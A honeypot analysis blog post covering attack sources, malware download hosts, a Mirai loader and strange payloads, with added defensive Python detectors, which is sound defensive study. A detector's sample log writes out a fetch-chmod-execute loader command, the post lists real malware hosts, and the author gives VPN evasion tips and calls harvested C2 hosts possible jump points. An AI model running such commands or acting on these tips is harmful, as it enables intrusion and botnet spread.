
Analyzing Honeypot Data after 2 Weeks

Two weeks ago I started a little experiment and set up the T-Pot honeypot collection on an AWS EC2 instance. This article describes what I have learned from analysing the collected data.

So much Noise

995,173 attacks against my server after 14 days! Most of this is background noise caused by fully automated attacks, so the chance is high that a real attack gets overlooked.

[Kibana table, type.keyword (descending) with count and percentage, 994,930 events in total; the screenshot is OCR-damaged, so only the legible cells are listed]
Heralding: 667,222
Dionaea: 200,677 (20.17%)
Honeytrap: 71,905 (7.227%)
Rdpy: 6,006 (0.604%)
Adbhoney, Ciscoasa, Mailoney, Elasticpot, Dicompot, Honeysap: 0.14% and less each (the two smallest rows show 109 and 15 events)

As a defender you need to find proper ways to filter out all this noise, to achieve a clean baseline and catch the real attackers.

It’s almost impossible to locate the attackers

The attacks are coming from all over the world. Therefore, you should be careful with statements about which country is responsible for the most hacking attacks. But it seems like Ireland is used as some kind of gateway for automated or bot-based hacking.

[Kibana table, geoip.country_name.keyword with ASN organisation: Ireland, Petersburg Internet Network Ltd., count 936,470 (56.229%)]

56 percent of all attacks come from Ireland, through „Petersburg Internet Network ltd.“, a Russian-based ISP. [https://pinspb.ru/]

These are the top 10 attacking IPs that use this ISP.

[Kibana table, attacker source IP, top 10: all ten addresses are in the 5.188.x.x range; the leading counts are 31,540, 31,298 and 31,061]

A quick check on https://www.ip2proxy.com/5.8.18.90#proxyresult shows that these IPs belong to a large VPN owned by Petersburg Internet Network.

[ip2proxy.com proxy detection result for 5.188.86.168]
Proxy Type: VPN
Country: NL, Netherlands
Region / City: Noord-Holland, Amsterdam
ISP: Petersburg Internet Network Ltd.
Domain: pinspb.ru

These are the network providers most frequently used for bot-based hacking.

[Kibana table, geoip.country_name.keyword with ASN organisation, count and percentage]
Ireland, Petersburg Internet Network Ltd.: 936,470 (56.229%)
United States, Digital Ocean: 129,957 (7.803%)
Vietnam, Viettel Corporation: 48,050 (2.885%)
Netherlands, Online S.a.s.: 42,366 (2.544%)
Venezuela, CANTV Servicios: 42,350 (2.543%)
United States, Massachusetts Institute of Technology: 42,301

Only a small percentage of the attackers are using the TOR network.

[Kibana legend "Cowrie - Attacker Src IP Reputation": known attacker, bad reputation, tor exit node, mass scanner, bot/crawler]

So if you want to be noticed as an attacker, you should use TOR. If you want to remain undetected, you should use popular VPN and proxy providers to disappear in the crowd.
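The noise figure, the country and ISP tables and the reputation tags above all come from the same Kibana event stream, so here is an added example (my own code, not the author's and not part of T-Pot) that reproduces those breakdowns on a handful of constructed events and then splits the stream into automated noise and a residual worth an analyst's time. It assumes T-Pot's flattened JSON event shape with a "type" field, "src_ip", a nested "geoip" object and an optional "ip_rep" tag; the sample events and their documentation-range addresses are constructed.

```python
"""Noise baseline for T-Pot style honeypot events.

Added example, not code from the original post or from the T-Pot project.
It assumes events in the flattened JSON shape that T-Pot's Logstash pipeline
feeds into Kibana: one object per event with "type" (honeypot name), "src_ip",
a nested "geoip" object with "country_name" and "as_org", and an optional
"ip_rep" reputation tag. The sample events below are constructed and use
documentation-range IP addresses.
"""
import json
from collections import Counter


def _event(src_ip, honeypot, country, as_org, rep=None):
    """Build one constructed event in the assumed T-Pot/Kibana shape."""
    event = {"type": honeypot, "src_ip": src_ip,
             "geoip": {"country_name": country, "as_org": as_org}}
    if rep:
        event["ip_rep"] = rep
    return event


# Constructed sample: one tagged mass scanner, one tagged known attacker,
# one untagged but noisy source, and two one-off sources.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in (
    [_event("203.0.113.10", "Heralding", "Ireland",
            "Petersburg Internet Network ltd.", "mass scanner")] * 5
    + [_event("198.51.100.7", "Dionaea", "United States",
              "Digital Ocean", "known attacker")] * 3
    + [_event("203.0.113.77", "Dionaea", "Netherlands", "Online S.a.s.")] * 4
    + [_event("192.0.2.99", "Cowrie", "Germany", "Example Hosting")]
    + [_event("192.0.2.200", "Cowrie", "Vietnam", "Viettel Corporation",
              "tor exit node")]
))

# Reputation tags that mark bulk, automated traffic. A Tor exit node is
# deliberately not in this set: Tor traffic is rare here and worth a look.
NOISY_TAGS = {"known attacker", "bad reputation", "mass scanner", "bot, crawler"}


def load_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def get_field(event, path):
    """Resolve a dotted Kibana-style field name such as geoip.country_name."""
    value = event
    for part in path.split("."):
        value = value.get(part) if isinstance(value, dict) else None
    return value


def breakdown(events, *paths):
    """Count events per field value (or per tuple of values) with share in %.

    Mirrors the Kibana tables in the post: e.g. breakdown(events, "type") or
    breakdown(events, "geoip.country_name", "geoip.as_org").
    """
    counts = Counter(tuple(get_field(e, p) for p in paths) for e in events)
    total = sum(counts.values())
    rows = []
    for key, n in counts.most_common():
        label = key if len(paths) > 1 else key[0]
        rows.append((label, n, round(100.0 * n / total, 3)))
    return rows


def noise_baseline(events, min_events=50, noisy_tags=NOISY_TAGS):
    """Split events into automated noise and the residual worth analyst time.

    An event is noise when its source carries a bulk-traffic reputation tag or
    when the same source produced at least min_events events in the window.
    """
    per_source = Counter(e["src_ip"] for e in events)
    noise, residual = [], []
    for e in events:
        bulk = e.get("ip_rep") in noisy_tags or per_source[e["src_ip"]] >= min_events
        (noise if bulk else residual).append(e)
    return noise, residual


if __name__ == "__main__":
    events = load_events(SAMPLE_LOG)
    for label, n, pct in breakdown(events, "type"):
        print(f"{label:<12} {n:>6} {pct:6.3f}%")
    for label, n, pct in breakdown(events, "geoip.country_name", "geoip.as_org"):
        print(f"{' / '.join(label):<50} {n:>6} {pct:6.3f}%")
    noise, residual = noise_baseline(events, min_events=3)
    print(f"noise: {len(noise)}, residual: {len(residual)}")
    for e in residual:
        print("  look at:", e["src_ip"], e["type"], e.get("ip_rep", "untagged"))
```

The volume threshold is the knob to tune against your own two-week baseline: with the real 995,173-event dataset a source that appears thousands of times is almost certainly a scanner, while an untagged address that shows up once or twice is exactly what the noise hides.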

Suspicious File Downloads

After the attack bots got access to my honeypot, some of them tried to download additional tools and scripts.

[Kibana table, src_ip.keyword and url.keyword (OCR-damaged): downloads from the sources 212.129.29.208 (three URLs), 134.209.76.96, 142.93.1.103, 34.87.180.89, 185.146.2x.28 (two URLs) and 159.203.18.156, fetching shell scripts, a Perl script and /bins/ binaries over HTTP and anonymous FTP from the hosts 178.159.36.245, 45.153.203.137, 46.249.32.194, 119.147.213.57, 185.239.242.62 and 185.243.215.254]

The attack bot with IP 212.129.29.208 used a dedicated server located in France and downloaded a script from 178.159.36.245, a server located in Russia.

[Shodan: 178.159.36.245, organisation Private Internet Hosting LTD, AS213058]

The same attacker downloaded another script from 45.153.203.137, a Windows computer based in the Netherlands.

[Shodan: 45.153.203.137, Brielle, Netherlands, organisation DediPath, AS213035, self-signed certificate]

34.87.180.89 (a Google Cloud instance) downloads a DDoS bot written in Perl (check this article for further analysis of this script https://www.programmersought.com/article/29824452895/) from a computer located in China.

[Shodan: 119.147.213.57, Shenzhen, China, organisation China Telecom (Group), AS4816]

All in all it is always the same pattern. Attackers use VPN, proxy or cloud providers to launch automated attacks. In case of success they download further tools and scripts from previously hacked machines. In most cases this is malware that tries to spread further.

I think it’s possible to generate a list of hosts that are used as command and control servers over time. These could be misused by ill-minded people for their own hacking attempts. So if you are looking for some jump points, running a honeypot could be a way…
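The defender's version of that host list is a blocklist with first-seen and last-seen dates. As an added example (my own code, not the author's and not part of Cowrie), the script below aggregates Cowrie's file_download events per download host, strips the anonymous:anonymous@ credentials that the FTP URLs in the table carry, and records which attacking sources used each host. It assumes Cowrie's JSON log format and its real field names (eventid, url, src_ip, session, timestamp); the log lines themselves are constructed with documentation-range addresses.

```python
"""Track download hosts seen by Cowrie as a defender's blocklist.

Added example, not code from the original post or from the Cowrie project.
It assumes Cowrie's JSON log format, where a download is logged as an event
with "eventid": "cowrie.session.file_download" carrying "url", "src_ip",
"session" and an ISO-8601 "timestamp" (those field names are Cowrie's; the
events below are constructed with documentation-range addresses).
"""
import json
from datetime import datetime, timezone
from urllib.parse import urlsplit

CONSTRUCTED_LOG = "\n".join(json.dumps(e) for e in [
    {"eventid": "cowrie.session.file_download", "timestamp": "2020-11-01T10:00:00.000000Z",
     "session": "a1", "src_ip": "203.0.113.10",
     "url": "http://198.51.100.20/bins/example.x86"},
    {"eventid": "cowrie.command.input", "timestamp": "2020-11-01T10:00:01.000000Z",
     "session": "a1", "src_ip": "203.0.113.10", "input": "uname -a"},
    {"eventid": "cowrie.session.file_download", "timestamp": "2020-11-03T08:30:00.000000Z",
     "session": "b2", "src_ip": "203.0.113.10",
     "url": "ftp://anonymous:anonymous@198.51.100.20/update.sh"},
    {"eventid": "cowrie.session.file_download", "timestamp": "2020-11-02T23:59:00.000000Z",
     "session": "c3", "src_ip": "198.51.100.7",
     "url": "http://192.0.2.60/bot.pl"},
    {"eventid": "cowrie.session.file_download", "timestamp": "2020-11-05T12:00:00.000000Z",
     "session": "d4", "src_ip": "203.0.113.44",
     "url": "http://198.51.100.20/bins/example.arm7"},
    {"eventid": "cowrie.session.file_download", "timestamp": "2020-11-05T12:01:00.000000Z",
     "session": "d4", "src_ip": "203.0.113.44", "url": "not a url"},
])


def parse_ts(value):
    """Cowrie writes UTC timestamps with a trailing Z; fromisoformat wants +00:00."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")).astimezone(timezone.utc)


def download_host(url):
    """Return the host part of a download URL, or None when it is unusable.

    urlsplit().hostname drops userinfo such as anonymous:anonymous@ and lowercases.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https", "ftp", "tftp") or not parts.hostname:
        return None
    return parts.hostname


def download_hosts(lines):
    """Aggregate file_download events into per-host first/last seen and sources."""
    hosts = {}
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("eventid") != "cowrie.session.file_download":
            continue
        host = download_host(event.get("url", ""))
        if host is None:
            continue
        ts = parse_ts(event["timestamp"])
        entry = hosts.setdefault(host, {"first_seen": ts, "last_seen": ts, "count": 0,
                                        "sources": set(), "schemes": set(), "paths": set()})
        entry["first_seen"] = min(entry["first_seen"], ts)
        entry["last_seen"] = max(entry["last_seen"], ts)
        entry["count"] += 1
        entry["sources"].add(event["src_ip"])
        entry["schemes"].add(urlsplit(event["url"]).scheme)
        entry["paths"].add(urlsplit(event["url"]).path)
    return hosts


def blocklist(hosts, min_sources=1):
    """Render hosts as sorted lines suitable for a firewall or IDS list.

    min_sources > 1 keeps only hosts that several independent attackers used,
    which is a good sign of shared infrastructure rather than a one-off.
    """
    lines = []
    for host, entry in sorted(hosts.items(), key=lambda kv: (-kv[1]["count"], kv[0])):
        if len(entry["sources"]) < min_sources:
            continue
        lines.append(f"{host} first={entry['first_seen']:%Y-%m-%d} "
                     f"last={entry['last_seen']:%Y-%m-%d} downloads={entry['count']} "
                     f"sources={len(entry['sources'])} schemes={','.join(sorted(entry['schemes']))}")
    return lines


if __name__ == "__main__":
    for line in blocklist(download_hosts(CONSTRUCTED_LOG)):
        print(line)
```

Hosts that stop appearing for a few weeks were usually cleaned up or re-imaged, so the last_seen date is what decides when an entry can be aged out of the list.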

Mirai

The honeypot also caught a Mirai worm, which is known for building botnets that can be used for DDoS attacks.

[Kibana table: src_ip.keyword 34.123.47.248 (dot placement reconstructed from the OCR), url.keyword pointing at host 119.147.213.57 (path unreadable)]

Let’s have a look at the downloaded shell script.

[Terminal screenshot of the downloaded shell script, heavily OCR-damaged. The legible fragments show the usual loader pattern: the script changes into writable directories (/var/run, /mnt, /root), fetches /bins/Astra from an HTTP server with curl -O, writes it out with cat Astra >rootz, runs chmod +x on it and executes ./rootz; the same block is repeated for each binary variant.]
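Every feature of that loader (hop into a writable directory, fetch, chmod +x, execute, per-architecture file names) shows up in the Cowrie command input of the session that ran it, so it can be scored without signatures. The following is an added example (my own code, not the author's and not part of Cowrie) that does exactly that over Cowrie's command.input events; it assumes Cowrie's JSON log format with the eventid and input fields, and the sample log lines are constructed with a documentation-range download host.

```python
"""Flag Mirai-style loader commands in Cowrie command input.

Added example, not code from the original post or from Cowrie. It assumes
Cowrie's JSON log format, in which every shell line typed by a visitor is an
event with "eventid": "cowrie.command.input" and the line in "input". The
sample lines below are constructed; the download host is a documentation
address.
"""
import json
import re

# Each indicator is one feature of the loader pattern visible in the post's
# screenshot: hop into a writable directory, fetch a binary, make it
# executable, run it, optionally clean up; multi-architecture file names are
# typical for IoT botnets that ship one binary per CPU.
INDICATORS = {
    "writable_dir": re.compile(r"\bcd\s+(?:/tmp|/var/run|/var/tmp|/mnt|/root|/dev/shm)\b"),
    "fetch": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "make_exec": re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"),
    "exec_local": re.compile(r"(?:^|[;&|]\s*)\./\S+"),
    "multi_arch": re.compile(r"\.(?:arm[4-7]?|mips|mpsl|m68k|sh4|spc|ppc|x32|x86)\b"),
    "cleanup": re.compile(r"\brm\s+-rf\b"),
}


def classify_command(command):
    """Return (flagged, matched indicator names) for one shell line.

    The line is flagged only when it both fetches something and makes it
    runnable or runs it: that combination is what separates a loader from a
    scanner that merely looks around.
    """
    matched = [name for name, rx in INDICATORS.items() if rx.search(command)]
    flagged = "fetch" in matched and ("make_exec" in matched or "exec_local" in matched)
    return flagged, matched


def scan_events(lines):
    """Collect flagged sessions from newline-delimited Cowrie JSON."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue
        flagged, matched = classify_command(event.get("input", ""))
        if flagged:
            hits.append({"session": event.get("session"), "src_ip": event.get("src_ip"),
                         "indicators": matched, "input": event["input"]})
    return hits


# Constructed sample: a look-around session, a loader session modelled on the
# screenshot (cd, curl, cat, chmod +x, execute), and a download without execution.
CONSTRUCTED_LOG = "\n".join(json.dumps(e) for e in [
    {"eventid": "cowrie.command.input", "session": "s1", "src_ip": "203.0.113.10",
     "input": "uname -a; cat /proc/cpuinfo | grep name; wc -l"},
    {"eventid": "cowrie.command.input", "session": "s2", "src_ip": "198.51.100.7",
     "input": "cd /tmp || cd /var/run || cd /mnt; curl -O http://198.51.100.20/bins/Astra.x86; "
              "cat Astra.x86 > rootz; chmod +x rootz; ./rootz; rm -rf Astra.x86"},
    {"eventid": "cowrie.command.input", "session": "s3", "src_ip": "192.0.2.99",
     "input": "cd /tmp; wget http://198.51.100.20/x.sh"},
    {"eventid": "cowrie.login.success", "session": "s3", "src_ip": "192.0.2.99"},
])

if __name__ == "__main__":
    for hit in scan_events(CONSTRUCTED_LOG):
        print(hit["session"], hit["src_ip"], ", ".join(hit["indicators"]))
        print("   ", hit["input"])
```

Session s3 in the sample downloads a script but never runs it, so it scores two indicators without being flagged; returning the indicator list alongside the verdict lets you lower or raise that bar per honeypot without rewriting the rules.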

What is behind 45.153.203.129?

According to Shodan it is a computer located in the Netherlands that offers HTTP and SMB.

[Shodan: 45.153.203.129, Brielle, Netherlands, organisation DediPath, AS213035]

It’s possible to connect to this machine via FTP.

The /bins/ folder contains some binaries.

[Apache directory listing "Index of /bins" on 45.153.203.129: Astra.arm5, Astra.arm6, Astra.arm7, Astra.m68k, Astra.mips, Astra.mpsl, Astra.sh4, Astra.spc, Astra.x32 and Astra.x86, all last modified 14-Nov-2020 03:15, sizes between 59K and 140K]
Apache/2.2.15 (Centos) Server at 45.153.203.129 port 80

And according to virustotal.com this is the Mirai worm.

[VirusTotal detection page for the Astra sample: SHA-256 278348d304af27ecd4e0dc2dc0bca88d046d36da3c0d1c55ff7409832257a9bb (as OCR'd from the screenshot, possibly with errors), 61.55 KB, 2020-11-14 UTC, 31 engines detected this file; verdicts include Trojan.Linux.Mirai (Avast), Trojan.Linux.Mirai_I and Trojan.Linux.Mirai.I]

I suppose this is not the only malware file the honeypot collected. The Dionaea docker container will surely contain more and I will check this later.

Strange Messages on the Wire

The bots send a lot of Japanese and Chinese gibberish in the form of HTTP requests to different websites.

[Kibana table, dest_ip.keyword with dest_port 443 and counts: www.google.com 10,076; iforgot.apple.com 10,064; www.evernote.com 4,823; followed by two 192.0.5x.x addresses, idmsa.apple.com, www.youtube.com, soundcloud.com and api.ipify.org with 3,001 and fewer events each. The payload column shows HTTP GET requests with desktop browser User-Agents (Mac OS X AppleWebKit/537.75.14 Version/6.1.3, Opera/9.80 with Presto/2.12.388, Chrome/34.0.1847.116 on Windows NT 6.1), an Accept-Language header and "Referer: http://google.com", followed by runs of non-ASCII bytes such as \xce, \xe0 and \xe1.]

We can use CyberChef to decode these strings.

And Google Translate will reveal some strange messages.

[Google Translate screenshot: the decoded payload renders as long runs of CJK characters (auto-detected as Japanese or Chinese), which translate to English as: "Number of dead bodies. If you have repeatedly set it up, you will be able to use it for a while. The number of times will be repeated. The number of times will changed. The corpse is embarrassed, and the corpse is embarrassed, and the corpse is embarrassing." and "If you are not in a position to do so, you can repeat it repeatedly, and then you will be able to do it again and again, you will be able to do it again and again, and that will be the case."]

The translation heavily depends on the symbols we remove from the original string. This feels a bit scary, so I personally don’t want to know what that actually means.
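The dependence on which symbols get removed has a mechanical explanation: the part after the HTTP headers is not text in any encoding, and legacy double-byte codecs such as GBK accept most pairs of high bytes, so any binary blob "decodes" into plausible-looking CJK characters that a translator will then happily interpret. As an added example (my own code, not the author's, CyberChef's or T-Pot's), the script below takes a constructed Kibana-style bytes field in the same b'...' repr form as the screenshot, splits the request header from the payload, and shows which codecs accept the payload and how different it looks under each. The request line, the headers and the payload bytes are all constructed.

```python
"""Why the "messages" depend on the codec: decode a captured payload field.

Added example, not code from the original post, CyberChef or T-Pot. It
assumes the payload is shown the way Kibana showed it in the post, as the
Python repr of a bytes object (b'GET ... \\r\\n\\r\\n\\xce\\xb9...'). The field
below is constructed: a short HTTP request plus a few high bytes.
"""
import ast

# Codecs an analyst might try on an unknown blob. Legacy double-byte codecs
# accept most pairs of bytes >= 0x80, so arbitrary binary data "decodes" into
# plausible-looking CJK characters under them.
CODECS = ("utf-8", "gbk", "shift_jis", "big5", "euc-kr")

CONSTRUCTED_FIELD = (
    r"b'GET / HTTP/1.1\r\nHost: www.google.com\r\n"
    r"User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36\r\n"
    r"Accept-Language: en\r\nReferer: http://google.com\r\n\r\n"
    r"\xce\xb9\xcc\xb4\xe1\xe3\xb1\xa2\xd9w\xb6\x86\xe8\xa1'"
)


def field_to_bytes(field):
    """Turn the textual repr of a bytes literal back into the real bytes."""
    value = ast.literal_eval(field)
    if not isinstance(value, bytes):
        raise ValueError("field is not a bytes literal")
    return value


def split_request(raw):
    """Separate the ASCII HTTP header from whatever follows the blank line."""
    marker = raw.find(b"\r\n\r\n")
    if marker < 0:
        return "", raw
    return raw[:marker].decode("ascii", errors="replace"), raw[marker + 4:]


def high_byte_ratio(data):
    """Share of bytes >= 0x80; text in any ASCII-based protocol keeps this low."""
    return sum(b >= 0x80 for b in data) / len(data) if data else 0.0


def strict_decodes(data, codecs=CODECS):
    """Codecs under which the blob is at least syntactically valid text."""
    ok = []
    for codec in codecs:
        try:
            data.decode(codec)
            ok.append(codec)
        except UnicodeDecodeError:
            pass
    return ok


def decode_views(data, codecs=CODECS):
    """The same bytes as each codec renders them, U+FFFD for invalid spots."""
    return {codec: data.decode(codec, errors="replace") for codec in codecs}


def cjk_ratio(text):
    """Share of characters in the CJK ideograph blocks."""
    cjk = sum(0x2E80 <= ord(ch) <= 0x9FFF or 0xF900 <= ord(ch) <= 0xFAFF for ch in text)
    return cjk / len(text) if text else 0.0


if __name__ == "__main__":
    header, body = split_request(field_to_bytes(CONSTRUCTED_FIELD))
    print(header.splitlines()[0])
    print(f"payload: {len(body)} bytes, {high_byte_ratio(body):.0%} high bytes")
    print("valid under:", strict_decodes(body))
    for codec, text in decode_views(body).items():
        print(f"{codec:>9}: {text!r}  cjk={cjk_ratio(text):.0%}")
```

A payload whose high-byte ratio is this high and that is invalid UTF-8 is better treated as opaque bytes (hash it, look at its length distribution, compare it across destinations) than as a message; the GBK and Shift_JIS views differ completely for the same input, which is the effect the translation experiment ran into.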

The same gibberish is sent out on different ports like port 25. I think this could be some kind of DDoS against a list of targets, but I’m not sure.

SSH Input

The Cowrie honeypot also collected some SSH sessions and their input.

Since most of this comes from bots, I will not investigate this data further for now. In the event of a real attack, however, this information can be very helpful.

Handy Tools

These tools have been very useful for further investigation:
